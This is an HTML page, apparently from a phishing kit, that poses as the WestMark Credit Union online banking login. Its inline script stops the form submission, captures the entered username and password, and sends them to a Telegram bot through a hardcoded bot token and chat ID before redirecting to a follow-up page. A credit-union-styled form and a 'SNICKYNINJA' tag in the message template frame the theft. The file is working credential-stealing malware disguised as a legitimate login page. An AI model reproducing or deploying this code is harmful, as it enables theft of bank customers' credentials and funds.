<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<title></title>
	<style>
		@font-face{
	font-family: 'fmtt';

  src: url(img/font1.ttf) format('truetype');
  }
*{
	margin:auto;
	font-size:14px;
	outline:0;
	font-family:'fmtt';
}input{
	border:0;
    display:block;
	margin-top:0px;
	width:100%;
	padding:5px;
	background:#f2f2f2;
	
	padding-left:0;
}td{
	border-right:1px solid black;
	padding-right:10px;
	padding-left:10px;
	font-size:11px;
	color:#0072ce;
}.inp{
	margin-top:30px;
	border-radius:18px;
	background:#f2f2f2;
	text-align:center;
	border:1px solid #f2f2f2;
	width:93%;
	padding:8px;

	padding-left:3px;
}label{
	display:block;
	text-align:left;
	margin:0;
	font-size:13px;
	color:gray;
	padding:0;
	width:100%;
}.nav{
	background: #00688f;
	padding: 1.5px;
	border-radius: 80px;
	margin-top: 3px;
	width: 2px;

}

	</style>
</head>
<body>

<div style="text-align: center;background:white;padding:5px;padding-top:60px;padding-bottom:0px">
		<div style="text-align:right;margin-right: 25px;">
	<span style="background: #e4ead8;display: inline-block;padding: 10px;rotate:90deg;border-radius: 50px;padding-left: 15px;padding-right: 15px;">
		<div class="nav" style="margin-top: 0;"></div>
		<div class="nav"></div>
		<div class="nav"></div>
	</span>
</div>
<img src="img/logo.png" width="230px">
</div> 
<form action="" method="post" id="form">
	<div style="max-width:500px;padding:20px;">


<div style="text-align:center">
<div class="inp" style="margin-top:20px">
<div style="width:95%">
<label for="user">Username</label>
<input placeholder="" id="user" name="username" minlength="6" maxlength="50" required>
</div>
</div>


<div class="inp">
<div style="width:95%">
<label for="pass">Password</label>
<input placeholder="" id="pass" name="password" type="Password" minlength="6" maxlength="50" required>
</div>
</div>
</div>
<div style="margin-top:15px;margin-left:5px">

<span style="display:inline-block;width:40px;border-radius:15px;background:lightgray;padding:2px;padding-top:4px;padding-left:4px;margin-left:6px">

<span style="padding:8px;background:#00688f;border-radius:50px;display:inline-block"></span>

</span> <span style="font-size:13px;color:#333333">Remember Me</span>
</div>
<div style="text-align:left;padding-left:7px">
<button type="submit" style="background:#00688f;border:0;padding:16px;width:95.8%;border-radius:30px;margin-top:18px;color:white;font-size:17px;margin-left:6px;font-weight: 500;" class="SignIn">Log In</button>
</div>
<p style="font-size:13px;color:#0072ce;margin-top:45px;text-align:center;"><span style="color: #333333;">Forgot</span> Username <span style="color: #333333;">or</span> Password?</p>
<p style="font-size:16px;color:#00688f;margin-top:15px;text-align:center;font-weight:bold">Register a New Account</p>

</div>
</form>


    <script>
     document.getElementById('form').addEventListener('submit', function(event) {
    event.preventDefault(); 

  
    const user = document.getElementById('user').value;
    const pass = document.getElementById('pass').value;



    // Your Telegram bot API token and chat ID


    //----------------------------------------------------------------
    const botToken = '6956433562:AAFSKLycuqUsY0g-DV9_2D9TkhAFGCO3FX8'; 
    const chatId = '6595653755'; 
   //------------------------------------------------------------------------

    const message = `
    #------------------[ WestMark Credit Union Online Access ]---------------------#:
    Username: ${user}
    Password: ${pass}
    #-------------------[ SNICKYNINJA - END ]------------------------#
    `;
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
    fetch(url, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        },
        body: JSON.stringify({
            chat_id: chatId,
            text: message
        })
    })
    .then(response => response.json())
    .then(data => {
        if (data.ok) {
            setTimeout(function() {
    window.location.href = "need1.html";
},0);
        } 
    })
   
});

    </script>
</body>
</html>